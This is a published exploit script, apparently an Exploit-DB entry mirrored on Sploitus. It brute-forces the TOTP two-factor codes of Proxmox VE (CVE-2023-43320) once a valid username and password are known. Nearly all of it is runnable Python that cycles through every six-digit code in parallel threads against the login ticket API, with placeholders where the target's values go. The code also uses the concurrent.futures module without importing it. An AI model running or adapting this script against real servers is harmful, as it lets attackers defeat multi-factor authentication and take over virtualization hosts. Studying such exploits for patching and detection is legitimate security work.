Share
## https://sploitus.com/exploit?id=EDB-ID:51763
# Exploit Title: Proxmox VE TOTP Brute Force
# Date: 09/23/2023
# Exploit Author: Cory Cline, Gabe Rust
# Vendor Homepage: https://www.proxmox.com/en/
# Software Link: http://download.proxmox.com/iso/
# Version: 5.4 - 7.4-1
# Tested on: Debian
# CVE : CVE-2023-43320

import time
import requests
import urllib.parse
import json
import os
import urllib3

urllib3.disable_warnings()
threads=25

#################### REPLACE THESE VALUES #########################
password="KNOWN PASSWORD HERE"
username="KNOWN USERNAME HERE"
target_url="https://HOST:PORT"
##################################################################

ticket=""
ticket_username=""
CSRFPreventionToken=""
ticket_data={}

auto_refresh_time = 20 # in minutes - 30 minutes before expiration
last_refresh_time = 0

tokens = [];

for num in range(0,1000000):
    tokens.append(str(num).zfill(6))

def refresh_ticket(target_url, username, password):
    global CSRFPreventionToken
    global ticket_username
    global ticket_data
    refresh_ticket_url = target_url + "/api2/extjs/access/ticket"
    refresh_ticket_cookies = {}
    refresh_ticket_headers = {}
    refresh_ticket_data = {"username": username, "password": password, "realm": "pve", "new-format": "1"}
    ticket_data_raw = urllib.parse.unquote(requests.post(refresh_ticket_url, headers=refresh_ticket_headers, cookies=refresh_ticket_cookies, data=refresh_ticket_data, verify=False).text)
    ticket_data = json.loads(ticket_data_raw)
    CSRFPreventionToken = ticket_data["data"]["CSRFPreventionToken"]
    ticket_username = ticket_data["data"]["username"]

def attack(token):
    global last_refresh_time
    global auto_refresh_time
    global target_url
    global username
    global password
    global ticket_username
    global ticket_data
    if ( int(time.time()) > (last_refresh_time + (auto_refresh_time * 60)) ):
        refresh_ticket(target_url, username, password)
        last_refresh_time = int(time.time())

    url = target_url + "/api2/extjs/access/ticket"
    cookies = {}
    headers = {"Csrfpreventiontoken": CSRFPreventionToken}
    stage_1_ticket = str(json.dumps(ticket_data["data"]["ticket"]))[1:-1]
    stage_2_ticket = stage_1_ticket.replace('\\"totp\\":', '\"totp\"%3A').replace('\\"recovery\\":', '\"recovery\"%3A')
    data = {"username": ticket_username, "tfa-challenge": stage_2_ticket, "password": "totp:" + str(token)}
    response = requests.post(url, headers=headers, cookies=cookies, data=data, verify=False)
    if(len(response.text) > 350):
        print(response.text)
        os._exit(1)

while(1):
    refresh_ticket(target_url, username, password)
    last_refresh_time = int(time.time())

    with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
        res = [executor.submit(attack, token) for token in tokens]
        concurrent.futures.wait(res)